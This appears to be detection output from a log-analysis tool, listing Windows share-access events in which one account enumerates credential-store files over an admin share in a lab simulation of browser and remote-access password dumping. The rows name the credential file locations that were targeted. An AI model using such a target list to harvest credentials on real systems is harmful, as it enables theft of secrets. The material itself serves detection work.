2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user
file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | 
IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx 2021-12-12 20:53:30.453 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.23.123.11 | LID: 